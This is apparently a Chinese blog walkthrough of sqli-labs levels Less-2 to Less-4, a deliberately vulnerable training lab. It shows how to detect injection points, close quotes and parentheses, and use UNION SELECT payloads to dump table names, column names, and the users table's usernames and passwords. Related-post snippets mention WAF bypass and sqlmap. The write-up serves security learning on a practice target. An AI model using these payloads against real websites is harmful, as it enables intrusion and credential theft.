Less_02--Less_04

最新推荐文章于 2023-03-02 21:14:54 发布
最新推荐文章于 2023-03-02 21:14:54 发布
阅读量161 收藏
点赞数
分类专栏: sqllab
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/James_ws/article/details/104540509
版权

Less-2

发现注入点(在参数后面加 ’ 查看页面是否报错,因为无论是字符型还是数字型,都会因为单引号个数不匹配而报错的)
在这里插入图片描述判断sql注入的类型,测试了
?id=1 and 1=1 页面正常
?id=1 and 1=2 页面报错
所以判定这个sql注入为数字型
在这里插入图片描述
因为在前面就做过后面的的了,这里就简单写一下:
测量字段:?id=-1 order by x
查看当前的数据库和版本:?id=-1 union select 1,database(),version()
查看当前的数据库的表名:?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=“security”
查看当前的数据库的users表中的列名:?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=“users”
爆破username和password的数据:?id=-1 union select 1,group_concat(username,‘X’,password),3 from users

Less_03

正常来,首先在参数后面加个单引号 ’ 页面也报错了。
在这里插入图片描述
我们看看报错:You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1'') LIMIT 0,1' at line 1
是可以看到是有个 )没有闭合,那么我将他闭合并配合 and 1=1 看到回显一样的[?id=1’) and 1=1],想到这里,就是后面的没有的括号没有闭合,所以就应该想到去将他注释掉,让sql语句正常执行。后面在这前面两个条件不变的情况下,去测试 and 1=2,页面报错,所以可以猜测源代码是$_GET=('$ID')的形式。
在这里插入图片描述
后面就是正常的猜字段长度,找数据库名,表名,列名,以及最后的爆破字段。(这里就不写了,都是一样的)
最后是完成了,我们在去看看源代码,验证一下自己的猜测:
在这里插入图片描述

Less_04

开启新的关卡,发现在参数后加单引号页面正常回显,但是双引号就报错了。
在这里插入图片描述看一下报错内容:You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '"1"") LIMIT 0,1' at line 1
其中的括号就是和Less_03是一样的意思,但是这里是双引号闭合。猜测源代码是$_GET=("$ID") 这样的形式。 就继续测试:其中 ?id=1") and 1=1 %23 正常回显 ?id=1") and 1=2 %23 页面报错
所以就继续的去猜字段长度,找数据库名,表名,列名,以及最后的爆破字段。(这里就不写了,都是一样的)
在这里插入图片描述完成了,在去看看源代码吧,不知道前面对不对。。
在这里插入图片描述

James_ws
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
IRQL_NOT_LESS_OR_EQUAL蓝屏分析
xdesk的专栏
10-11 6万+
文章目录IRQL_NOT_LESS_OR_EQUAL蓝屏分析1. 背景2. 分析3. 总结 IRQL_NOT_LESS_OR_EQUAL蓝屏分析 最近有朋友遇到了一个客户电脑出现蓝屏,由于朋友最近比较忙,简单看一下没有发现问题就将dump发给我,刚好最近有点空闲时间而且自己似乎很久没有排查和分析过问题了,因此就私下分析了一下,有了今天的文章。 1. 背景 由于这个问题并非可以重现的必现问题,因此在这里只能分析一下DUMP文件,初步看一下错误码信息,如下: IRQL_NOT_LESS_OR_EQUAL (a)
10039639C00_Power Supply Board-Tantalum Less_SCH-电路图
04-27
10039639C00_Power Supply Board-Tantalum Less_SCH
sql注入,关于id=‘1 and 1=1‘
m0_55306747的博客
11-25 1万+
在做sql-labs靶场时,学到了,这个知识点很重要,当时发现这个问题困惑了我许久 正常的注入语句:select * from users where id = 1 select * from users where id = '1'也可以查询出和语句一相同的结果 select * from users where id = '$id' 令id=1" 语句变为select * from users where id = '1"' 此时引号正常闭合,按理说应当是查询users表中,id为1"的所有
安全狗的绕过
alien0011的博客
06-09 3458
安全狗的绕过(截至6.8号) 环境: phpstudy2018 安全狗apache版 sqllabs靶场 安全狗绕过思路: 安全狗是基于正则匹配的绕过,所以总是能够绕过其正则匹配实现sql的命令执行,需要对数据库语句灵活掌握。经过对安全狗的fuzz,测试其拦截规则,发现其实and、or这样的敏感字符是不会被直接拦截的,但是and加空格就会被拦截,其实绕过的中心可以向如何绕过空格偏移。 为了可以更清晰的认知注入语句是如何在数据库中执行的,我修改了sqli-lab的代...
web安全入门之SQL注入-报错型注入
weixin_43726831的博客
09-12 1184
SQL注入之报错型注入法 1.报错型注入分析 报错型注入法适用于无回显数据的场景,适合于没有显示位的web页面,但是有mysql报错输出的场景。metasploitable2-Linux在Less-5和Less-6中就用到了报错型注入方法 这种页面有明显的三种场景 场景1:正确查询成功场景为结果显示。 场景2:正确查询失败场景为空,不显示。 场景3:错误语句查询场景,显示报错语句。 在这种情况下...
布尔盲注之sqlmap爆破
m0_52699073的博客
01-23 1404
布尔盲注之sqlmap爆破 ————————————————————————————— 好久没有更新了,语句也忘的差不多了…。作为菜鸟的我也是终于弄懂了这道题,以及部分语句的意思。我将用尽可能详细且易理解的语言来表达。 sqlmap爆破(首先你得下载sqlmap,csdn中刚好有) 注入语句:python sqlmap.py -u"XXXXX" -batch是基本的注入框架。 一.爆破数据库的库名 输入:python sqlmap.py -u"http://challenge-cb6615ef28a95b3
less和less-loader版本搭配
Father_Of_Soft的博客
03-02 3773
less为4版本时,less-loader为5~7没有问题,我安装的是7版本。
less和less-loader版本
a5252145的博客
09-27 2万+
严格控制版本号 npm install less@3.9.0 less-loader@4.1.0 --save-dev
项目中安装 less 和 less-loader 命令
热门推荐
Kuroko's Development Notes
01-03 6万+
npm命令如下: npm install less less-loader --save-dev 或者 yarn命令如下: yarn add less less-loader --dev 建议安装在本地依赖,没必要装全局环境,安装成功后 package.json 如下:   要安装全局的话,直接参考less官网:  ...
vue安装less、less-loader
weixin_51357044的博客
05-27 5164
最近安装这个less一直报错,要么是less要么是less-loader,各种百度各种不行,最终我这个方法安装成功了 npm ERR! code ERESOLVE npm ERR! ERESOLVE could not resolve npm ERR! npm ERR! While resolving: @vue/eslint-config-standard@6.1.0 npm ERR! Found: eslint-plugin-vue@8.7.1 npm ERR! node_modules/eslint-
Vue项目安装less和less-loader
weixin_52580677的博客
10-24 2万+
less-loader的版本号要搭配webpack的版本号来选择,webpack@4+可以选择的less-loader版本是5~7。完成less的安装后,我们只需要在style节点上加上lang=‘less’,就可以使用less语法了。在vue项目打开终端,进入项目安装(我记得less好像全局安装没用,每个vue项目要单独安装)less目前的最高版本是5+,但保险起见,我们还是安装4+比较好。上一步中,我们已经知道webpack的版本是4+如果没有安装,要先进行安装。打开cmd,通过命令查看。
Buck_boostinverting.rar_Greater_Transformer-less_VOLTAGE MAGNITU
07-14
The buck–boost converter is a type of DC-to-DC converter that has an output voltage magnitude that is either greater than or less than the input voltage magnitude. It is equivalent to a flyback ...
lcd.zip_Delay-dependent_T-S FUZZY_T-S with time delay_time-depen
09-14
In this paper, we have investigated the delay-dependent design of state ... Finally, two illustrative examples have shown numerically that our results are less conservative than the existing ones.
old_less-margin-helper-classes:CSS边距助手类使用类快速为元素分配边距
07-07
$ ngx install less-margin-helper-classes 不知道ngx命令行工具是什么? 了解有关更多信息。 如何使用 这些组件公开了以下 CSS 类: @margin-xxs : .1 rem ; @margin-xs : .3 rem ; @margin-s : .5 rem ; @...
Python库 | lesscode_py-0.0.28-py3-none-any.whl
04-23
资源分类:Python库 所属语言:Python 使用前提:需要解压 资源全名:lesscode_py-0.0.28-py3-none-any.whl 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
1446-基于51单片机的气压检测(MPX4115,上位机,LCD)proteus,原理图、流程图、物料清单、仿真图、源代码
09-06
1446-基于51单片机的气压检测(MPX4115,上位机,LCD)proteus,原理图、流程图、物料清单、仿真图、源代码 资料介绍: 1、使用气压传感器MPX4115检测气压 2、利用LCD1602显示气压 3、把气压值上传到上位机 有哪些资料: 1、仿真工程文件 2、源代码工程文件 3、原理图工程文件 4、流程图 5、功能介绍 6、元件清单 7、上位机软件 8、演示视频
8051Proteus仿真c源码用定时器T0的中断实现长时间定时
最新发布
09-06
8051Proteus仿真c源码用定时器T0的中断实现长时间定时提取方式是百度网盘分享地址
威纶通HMI登陆方式(二):索引密码登陆
09-06
通过用户参数设置、高级安全模式控制地址的使用以及用户登陆界面的设计实现威纶通HMI索引密码登陆。
基于yolov8的抽烟检测系统python源码+onnx模型+评估指标曲线+精美GUI界面.zip
09-06
【测试环境】 windows10 anaconda3+python3.8 torch==1.9.0+cu111 ultralytics==8.2.70 【模型可以检测出类别】 cig-pack smoke 更多实现细节参考博文:https://blog.csdn.net/FL1623863129/article/details/141964642
npm ERR! code E404 npm ERR! 404 Not Found - GET https://registry.npmjs.org/less_loader - Not found npm ERR! 404 npm ERR! 404 'less_loader@latest' is not in the npm registry.
04-23
这个问题看起来是在使用npm安装模块时发生了404错误。可能是因为模块的名称或版本号被错误地拼写或使用了已经被删除的模块。建议您检查一下您的包管理文件中是否有拼写错误或错误的依赖版本。另外,您可以尝试使用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值